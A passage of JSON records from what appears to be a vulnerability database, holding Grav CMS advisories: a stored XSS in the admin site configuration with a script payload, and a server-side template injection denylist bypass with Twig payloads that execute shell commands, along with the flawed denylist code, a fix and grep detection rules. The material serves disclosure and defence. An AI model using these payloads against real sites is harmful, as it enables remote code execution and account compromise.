:"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:05:10Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-662m-56v4-3r8f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66294","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring
_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66294"},{"reference_url":"https://github.com/advisories/GHSA-662m-56v4-3r8f","reference_id":"GHSA-662m-56v4-3r8f","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-662m-56v4-3r8f"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66294","GHSA-662m-56v4-3r8f"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vp4w-2f8d-vfcf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/29967?format=json","vulnerability_id":"VCID-xe66-6nav-c7gy","summary":"Grav Admin Plugin vulnerable to Cross-Site Scripting (XSS) Stored endpoint `/admin/config/site` parameter `data[taxonomies]`\n## Summary\n\nA Stored Cross-Site Scripting (XSS) vulnerability was identified in the `/admin/config/site` endpoint of the _Grav_ application. This vulnerability allows attackers to inject malicious scripts into the `data[taxonomies]` parameter. The injected payload is stored on the server and automatically executed in the browser of any user who accesses the affected site configuration, resulting in a persistent attack vector.\n\n---\n\n## Details\n\n**Vulnerable Endpoint:** `POST /admin/config/site`  \n**Parameter:** `data[taxonomies]`\n\nThe application does not properly validate or sanitize input in the `data[taxonomies]` field. 
As a result, an attacker can inject JavaScript code, which is stored in the site configuration and later rendered in the administrative interface or site output, causing automatic execution in the user's browser.\n\n---\n\n## PoC\n\n**Payload:**\n\n`\"><script>alert('XSS-PoC')</script>`\n\n### Steps to Reproduce:\n\n1. Log in to the _Grav_ Admin Panel with sufficient permissions to modify site configuration.\n    \n2. Navigate to **Configuration > Site**.\n    \n3. In the **Taxonomies Types** field (which maps to `data[taxonomies]`), insert the payload above:\n          \n    `\"><script>alert('XSS-PoC')</script>`\n    \n4. Save the configuration.\n\n<img width=\"1897\" height=\"628\" alt=\"Pasted image 20250718195942\" src=\"https://github.com/user-attachments/assets/2035fcaa-34fc-494c-a7ca-7c1e1f34b057\" />\n    \n5. Go on Pages and click on one of them\n\n<img width=\"932\" height=\"587\" alt=\"Pasted image 20250718200306\" src=\"https://github.com/user-attachments/assets/3c1995ba-2581-4e27-ae9d-a17e2eeb5b57\" />\n    \n6. The stored payload is executed immediately in the browser, confirming the Stored XSS vulnerability.\n\n<img width=\"1204\" height=\"377\" alt=\"Pasted image 20250718200353\" src=\"https://github.com/user-attachments/assets/ad8ea7ea-603f-4b84-aa5a-120de0cb56ce\" />\n    \n7. 
The HTTP request submitted during this process contains the vulnerable parameter and payload:\n    \n<img width=\"757\" height=\"675\" alt=\"Pasted image 20250718200445\" src=\"https://github.com/user-attachments/assets/fbbe2b76-00eb-4426-8ddd-5cde2cc65d77\" />\n\n---\n\n## Impact\n\nStored XSS attacks can lead to severe consequences, including:\n\n- **Session hijacking:** Stealing cookies or authentication tokens to impersonate users\n    \n- **Credential theft:** Harvesting usernames and passwords using malicious scripts\n    \n- **Malware delivery:** Distributing unwanted or harmful code to victims\n    \n- **Privilege escalation:** Compromising administrative users through persistent scripts\n    \n- **Data manipulation or defacement:** Changing or disrupting site content\n    \n- **Reputation damage:** Eroding trust among site users and administrators\n    \n\n---\n\n## Discoverer\n\n[Marcelo Queiroz](www.linkedin.com/in/marceloqueirozjr) \n\nby [CVE-Hunters](https://github.com/Sec-Dojo-Cyber-House/cve-hunters)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66308","reference_id":"","reference_type":"","scores":[{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.07374","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66308"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","sco
ring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:13:50Z/"}],"url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-gqxx-248x-g29f","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:13:50Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-gqxx-248x-g29f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66308","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66308"},{"reference_url":"https://github.com/advisories/GHSA-gqxx-248x-g29f","reference_id":"GHSA-gqxx-248x-g29f","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gqxx-248x-g29f"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66308","GHSA-gqxx-248x-g29f"],"risk_score":null,"exploitability":null,"weighted_severity":null,"res
ource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xe66-6nav-c7gy"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/38965?format=json","vulnerability_id":"VCID-ya18-2867-f7ar","summary":"Hi, \n\nactually we have sent the bug report to security@getgrav.org on 27th March 2023 and on 10th April 2023.\n\n# Grav Server-side Template Injection (SSTI) via Denylist Bypass Vulnerability\n\n## Summary:  \n| **Product**             | Grav CMS                                      |\n| ----------------------- | --------------------------------------------- |\n| **Vendor**              | Grav                                          |\n| **Severity**            | High - Users with login access to Grav Admin panel and page creation/update permissions are able to obtain remote code/command execution |\n| **Affected Versions**   | <= [v1.7.40](https://github.com/getgrav/grav/tree/1.7.40) (Commit [685d762](https://github.com/getgrav/grav/commit/685d76231a057416651ed192a6a2e83720800e61)) (Latest version as of writing) |\n| **Tested Versions**     | v1.7.40                                       |\n| **Internal Identifier** | STAR-2023-0006                                |\n| **CVE Identifier**      | Reserved CVE-2023-30592, CVE-2023-30593, CVE-2023-30594                                           |\n| **CWE(s)**              | CWE-184: Incomplete List of Disallowed Inputs, CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine |\n\n## CVSS3.1 Scoring System:  \n**Base Score:** 7.2 (High)  \n**Vector String:** `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H`  \n| **Metric**                   | **Value** |\n| ---------------------------- | --------- |\n| **Attack Vector (AV)**       | Network   |\n| **Attack Complexity (AC)**   | Low       |\n| **Privileges Required (PR)** | High      |\n| **User Interaction (UI)**    | None      |\n| **Scope (S)**                | Unchanged |\n| **Confidentiality \\(C)**     | High      |\n| 
**Integrity (I)**            | High      |\n| **Availability (A)**         | High      |\n\n## Product Overview:  \nGrav is a PHP-based flat-file content management system (CMS) designed to provide a fast and simple way to build websites. It supports rendering of web pages written in Markdown and Twig expressions, and provides an administration panel to manage the entire website via an optional Admin plugin.\n\n## Vulnerability Summary:  \nThe denylist introduced in commit [9d6a2d](https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83) to prevent dangerous functions from being executed via injection of malicious templates was insufficient and could be easily subverted in multiple ways -- (1) using unsafe functions that are not banned, (2) using capitalised callable names, and (3) using fully-qualified names for referencing callables. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution.\n\n## Vulnerability Details:  \nIn addressing [CVE-2022-2073](https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/), a denylist was introduced in commit [9d6a2d](https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83) to validate and ensure that dangerous functions could not be executed via injection of malicious templates.\n\nThe implementation of the denylist can be found in `Utils::isDangerousFunction()` within [/system/src/Grav/Common/Utils.php](https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190):\n~~~php\n    /**\n     * @param string $name\n     * @return bool\n     */\n    public static function isDangerousFunction(string $name): bool\n    {\n        static $commandExecutionFunctions = [\n            'exec',\n            'passthru',\n            'system',\n            'shell_exec',\n            'popen',\n            'proc_open',\n          
  'pcntl_exec',\n        ];\n\n        static $codeExecutionFunctions = [\n            'assert',\n            'preg_replace',\n            'create_function',\n            'include',\n            'include_once',\n            'require',\n            'require_once'\n        ];\n\n        static $callbackFunctions = [\n            'ob_start' => 0,\n            'array_diff_uassoc' => -1,\n            'array_diff_ukey' => -1,\n            'array_filter' => 1,\n            'array_intersect_uassoc' => -1,\n            'array_intersect_ukey' => -1,\n            'array_map' => 0,\n            'array_reduce' => 1,\n            'array_udiff_assoc' => -1,\n            'array_udiff_uassoc' => [-1, -2],\n            'array_udiff' => -1,\n            'array_uintersect_assoc' => -1,\n            'array_uintersect_uassoc' => [-1, -2],\n            'array_uintersect' => -1,\n            'array_walk_recursive' => 1,\n            'array_walk' => 1,\n            'assert_options' => 1,\n            'uasort' => 1,\n            'uksort' => 1,\n            'usort' => 1,\n            'preg_replace_callback' => 1,\n            'spl_autoload_register' => 0,\n            'iterator_apply' => 1,\n            'call_user_func' => 0,\n            'call_user_func_array' => 0,\n            'register_shutdown_function' => 0,\n            'register_tick_function' => 0,\n            'set_error_handler' => 0,\n            'set_exception_handler' => 0,\n            'session_set_save_handler' => [0, 1, 2, 3, 4, 5],\n            'sqlite_create_aggregate' => [2, 3],\n            'sqlite_create_function' => 2,\n        ];\n\n        static $informationDiscosureFunctions = [\n            'phpinfo',\n            'posix_mkfifo',\n            'posix_getlogin',\n            'posix_ttyname',\n            'getenv',\n            'get_current_user',\n            'proc_get_status',\n            'get_cfg_var',\n            'disk_free_space',\n            'disk_total_space',\n            'diskfreespace',\n            
'getcwd',\n            'getlastmo',\n            'getmygid',\n            'getmyinode',\n            'getmypid',\n            'getmyuid'\n        ];\n\n        static $otherFunctions = [\n            'extract',\n            'parse_str',\n            'putenv',\n            'ini_set',\n            'mail',\n            'header',\n            'proc_nice',\n            'proc_terminate',\n            'proc_close',\n            'pfsockopen',\n            'fsockopen',\n            'apache_child_terminate',\n            'posix_kill',\n            'posix_mkfifo',\n            'posix_setpgid',\n            'posix_setsid',\n            'posix_setuid',\n        ];\n\n        if (in_array($name, $commandExecutionFunctions)) {\n            return true;\n        }\n\n        if (in_array($name, $codeExecutionFunctions)) {\n            return true;\n        }\n\n        if (isset($callbackFunctions[$name])) {\n            return true;\n        }\n\n        if (in_array($name, $informationDiscosureFunctions)) {\n            return true;\n        }\n\n        if (in_array($name, $otherFunctions)) {\n            return true;\n        }\n\n        return static::isFilesystemFunction($name);\n    }\n\n    /**\n     * @param string $name\n     * @return bool\n     */\n    public static function isFilesystemFunction(string $name): bool\n    {\n        static $fileWriteFunctions = [\n            'fopen',\n            'tmpfile',\n            'bzopen',\n            'gzopen',\n            // write to filesystem (partially in combination with reading)\n            'chgrp',\n            'chmod',\n            'chown',\n            'copy',\n            'file_put_contents',\n            'lchgrp',\n            'lchown',\n            'link',\n            'mkdir',\n            'move_uploaded_file',\n            'rename',\n            'rmdir',\n            'symlink',\n            'tempnam',\n            'touch',\n            'unlink',\n            'imagepng',\n            'imagewbmp',\n            
'image2wbmp',\n            'imagejpeg',\n            'imagexbm',\n            'imagegif',\n            'imagegd',\n            'imagegd2',\n            'iptcembed',\n            'ftp_get',\n            'ftp_nb_get',\n        ];\n\n        static $fileContentFunctions = [\n            'file_get_contents',\n            'file',\n            'filegroup',\n            'fileinode',\n            'fileowner',\n            'fileperms',\n            'glob',\n            'is_executable',\n            'is_uploaded_file',\n            'parse_ini_file',\n            'readfile',\n            'readlink',\n            'realpath',\n            'gzfile',\n            'readgzfile',\n            'stat',\n            'imagecreatefromgif',\n            'imagecreatefromjpeg',\n            'imagecreatefrompng',\n            'imagecreatefromwbmp',\n            'imagecreatefromxbm',\n            'imagecreatefromxpm',\n            'ftp_put',\n            'ftp_nb_put',\n            'hash_update_file',\n            'highlight_file',\n            'show_source',\n            'php_strip_whitespace',\n        ];\n\n        static $filesystemFunctions = [\n            // read from filesystem\n            'file_exists',\n            'fileatime',\n            'filectime',\n            'filemtime',\n            'filesize',\n            'filetype',\n            'is_dir',\n            'is_file',\n            'is_link',\n            'is_readable',\n            'is_writable',\n            'is_writeable',\n            'linkinfo',\n            'lstat',\n            //'pathinfo',\n            'getimagesize',\n            'exif_read_data',\n            'read_exif_data',\n            'exif_thumbnail',\n            'exif_imagetype',\n            'hash_file',\n            'hash_hmac_file',\n            'md5_file',\n            'sha1_file',\n            'get_meta_tags',\n        ];\n\n        if (in_array($name, $fileWriteFunctions)) {\n            return true;\n        }\n\n        if (in_array($name, 
$fileContentFunctions)) {\n            return true;\n        }\n\n        if (in_array($name, $filesystemFunctions)) {\n            return true;\n        }\n\n        return false;\n    }\n~~~\n\nThe list of banned functions appears to be adapted from a [StackOverflow post](https://stackoverflow.com/a/3697776). While the denylist looks rather comprehensive, there are actually multiple issues with the denylist implementation:\n1. There may be unsafe functions, be it built-in to PHP or user-defined, which are not be blocked. For example, `unserialize()` and aliases of blocked functions, such as `ini_alter()`, are not being included in the denylist.  \n2. A case-sensitive comparison is performed against the denylist, but PHP function names are case-insensitive. This allows using `filter('SYSTEM')` to trivially bypass the denylist validation check.  \n3. Fully qualified names can be used when referencing functions, allowing `filter('\\system')` to trivially bypass the denylist validation checks.  \n\n## Exploit Conditions:    \nThis vulnerability can be exploited if the attacker has access to:\n1. an administrator account, or\n2. a non-administrative user account with the following permissions granted:\n    - login access to Grav admin panel, and\n    - page creation or update rights\n\n## Reproduction Steps:  \n1. Log in to Grav Admin using an administrator account.\n2. Navigate to `Accounts > Add`, and ensure that the following permissions are assigned when creating a new low-privileged user:\n    * Login to Admin - Allowed\n    * Page Update - Allowed\n3. Log out of Grav Admin, and log back in using the account created in step 2.\n4. Navigate to `http://<grav_installation>/admin/pages/home`.\n5. Click the `Advanced` tab and select the checkbox beside `Twig` to ensure that Twig processing is enabled for the modified webpage.\n6. 
Under the `Content` tab, insert the following payload within the editor:\n   ~~~twig\n   // Method 1: Using unserialize() to trigger system('id') call\n   // Serialized payloaed generated using the phpggc tool: ./phpggc -b Monolog/RCE7 system 'id'\n   // {{ 'TzozNzoiTW9ub2xvZ1xIYW5kbGVyXEZpbmdlcnNDcm9zc2VkSGFuZGxlciI6NDp7czoxNjoiACoAcGFzc3RocnVMZXZlbCI7aTowO3M6MTA6IgAqAGhhbmRsZXIiO3I6MTtzOjk6IgAqAGJ1ZmZlciI7YToxOntpOjA7YToyOntpOjA7czoyOiJpZCI7czo1OiJsZXZlbCI7aTowO319czoxMzoiACoAcHJvY2Vzc29ycyI7YToyOntpOjA7czozOiJwb3MiO2k6MTtzOjY6InN5c3RlbSI7fX0=' | base64_decode | array | filter('unserialize') }}\n   \n   // Method 2: Trigger system('id') via case-insensitive function names\n   {{ ['id'] | filter('System') }}\n   \n   // Method 3: Trigger system('id') via fully qualified names when referencing functions\n   {{ ['id'] | filter('\\\\system') }}\n   ~~~   \n7. Click the Preview button. Observe that the output of the `id` shell command is returned in the preview.\n\n## Suggested Mitigations:  \nIt is recommended to review the list of functions, both default functions in PHP and user-defined functions, and include missing unsafe functions in the denylist. 
A non-exhaustive list of missing unsafe functions discovered is shown below:\n- `unserialize()`\n- `ini_alter()`\n- `simplexml_load_file()`\n- `simplexml_load_string()`\n- `forward_static_call()`\n- `forward_static_call_array()`\n\nThe `Utils::isDangerousFunction()` function in [/system/src/Grav/Common/Utils.php](https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1956-L2074) should also be patched to disallow usage of fully qualified names when specifying callables, as well as ensure that validation performed on the `$name` parameter is case-insensitive.\n\nFor example,\n~~~diff php\n...\nabstract class Utils\n{\n    ...\n    /**\n     * @param string $name\n     * @return bool\n     */\n    public static function isDangerousFunction(string $name): bool\n    {\n        ...\n+       if ($arrow instanceof Closure) {\n+           return false;\n+       }\n\n+       $name = strtolower($name);\n+       if (strpos($name, \"\\\\\") !== false) {\n+           return false;\n+       }\n\n        if (in_array($name, $commandExecutionFunctions)) {\n            return true;\n        }\n\n        if (in_array($name, $codeExecutionFunctions)) {\n            return true;\n        }\n\n        if (isset($callbackFunctions[$name])) {\n            return true;\n        }\n\n        if (in_array($name, $informationDiscosureFunctions)) {\n            return true;\n        }\n\n        if (in_array($name, $otherFunctions)) {\n            return true;\n        }\n\n        return static::isFilesystemFunction($name);\n    }\n    ...\n}\n~~~\n\nEnd users should also ensure that `twig.undefined_functions` and `twig.undefined_filters` properties in `/path/to/webroot/system/config/system.yaml` configuration file are set to `false` to disallow Twig from treating undefined filters/functions as PHP functions and executing them.\n\n## Detection Guidance:  \nThe following strategies may be used to detect potential exploitation attempts.\n1. 
Searching within Markdown pages using the following shell command:  \n   `grep -Priz -e '(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|\\|\\s*(filter|map|reduce))\\s*\\(' /path/to/webroot/user/pages/`\n2. Searching within Doctrine cache data using the following shell command:  \n   `grep -Priz -e '(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|\\|\\s*(filter|map|reduce))\\s*\\(' --include '*.doctrinecache.data' /path/to/webroot/cache/`\n3. Searching within Twig cache using the following shell command: \n   `grep -Priz -e '(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|twig_array_(filter|map|reduce))\\s*\\(' /path/to/webroot/cache/twig/`\n4. Searching within compiled Twig template files using the following shell command:  \n   `grep -Priz -e '(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|\\|\\s*(filter|map|reduce))\\s*\\(' /path/to/webroot/cache/compiled/files/`\n\nNote that it is not possible to detect indicators of compromise reliably using the Grav log file (located at `/path/to/webroot/logs/grav.log` by default), as successful exploitation attempts do not generate any additional logs. However, it is worthwhile to examine any PHP errors or warnings logged to determine the existence of any failed exploitation attempts.\n\n## Credits:  \nNgo Wei Lin ([@Creastery](https://twitter.com/Creastery)) & Wang Hengyue ([@w_hy_04](https://twitter.com/w_hy_04)) of STAR Labs SG Pte. Ltd. ([@starlabs_sg](https://twitter.com/starlabs_sg))\n\nThe scheduled disclosure date is _**25th July, 2023**_. Disclosure at an earlier date is also possible if agreed upon by all parties.  \n\nKindly note that STAR Labs reserved and assigned the following CVE identifiers to the respective vulnerabilities presented in this report:  \n1. 
**CVE-2023-30592**\n    Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in `Utils::isDangerousFunction()` and to achieve remote code execution via usage of unsafe functions, such as `unserialize()`, that are not blocked. This is a bypass of CVE-2022-2073.\n2. **CVE-2023-30593**\n    Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in `Utils::isDangerousFunction()` and to achieve remote code execution via usage of capitalised names, supplied as strings, when referencing callables. This is a bypass of CVE-2022-2073.\n3. **CVE-2023-30594**\n    Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in `Utils::isDangerousFunction()` and to achieve remote code execution via usage of fully-qualified names, supplied as strings, when referencing callables. 
This is a bypass of CVE-2022-2073.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-34253","reference_id":"","reference_type":"","scores":[{"value":"0.02104","scoring_system":"epss","scoring_elements":"0.84359","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-34253"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:39:27Z/"}],"url":"https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190"},{"reference_url":"https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec"},{"reference_url":"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N
/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:39:27Z/"}],"url":"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"},{"reference_url":"https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8"},{"reference_url":"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:39:27Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm"},{"reference_url":"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66","reference_id":"","refere
nce_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66"},{"reference_url":"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:39:27Z/"}],"url":"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34253","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34253"},{"reference_url":"https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:39:27Z/"}],"url":"https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83"},{"reference_url":"https://github.com/advisories/GHSA-j3v8-v77f-fvgm","reference_id":"GHSA-j3v8-v77f-fvgm","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-j3v8-v77f-fvgm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/pac
